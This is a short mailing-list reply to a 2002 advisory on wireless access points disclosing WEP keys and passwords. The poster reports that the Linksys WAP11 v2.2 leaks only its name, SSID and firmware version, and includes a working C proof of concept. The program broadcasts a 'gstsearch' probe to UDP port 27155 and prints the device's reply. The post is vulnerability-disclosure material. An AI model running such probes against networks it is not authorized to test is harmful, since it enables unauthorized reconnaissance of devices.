Hi,

Linksys WAP11-V2.2 seems to be vulnerable in a different way. It only
returns AP's name,
SSID and firmware version. Except for firmware version, those are not
private informations.

Quickly patched proof of concept :

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>

typedef struct {
  char type[28];
  char blank1[8];
  char apname[32];
  char firmware[6];
  char blank2[11];
  char ssid[32];
}
__attribute__ ((packed)) answer;

int main()
{
        char rcvbuffer[1024];
        struct sockaddr_in sin;
        answer* ans = (answer *)rcvbuffer;
        int sd, ret, val;

        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr("255.255.255.255");
        sin.sin_port = htons(27155);

        sd = socket(AF_INET, SOCK_DGRAM, 0);
        if (sd < 0)
                perror("socket");

        val = 1;
        ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
        if (ret < 0)
        {
                perror("setsockopt");
                exit(1);
        }

        ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr));
        if (ret < 0)
        {
                perror("sendto");
                exit(1);
        }

        ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));
    if (ret > 0)
    {
      printf("Type : %s\n", ans->type);
      printf("Announced Name : %s\n", ans->apname);
      printf("Firmware version : %s\n", ans->firmware);
      printf("SSID : %s\n", ans->ssid);
    }
    else
      perror("read");
        return 0;
}

thomas

>KHAMSIN Security News
>KSN Reference: 2002-11-01 0001 ULO
>---------------------------------------------------------------------------
>
>Title
>-----
> Accesspoints disclose wep keys, password and mac filter
>
>Date
>----
> 2002-11-01
>
>
>
>
>

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]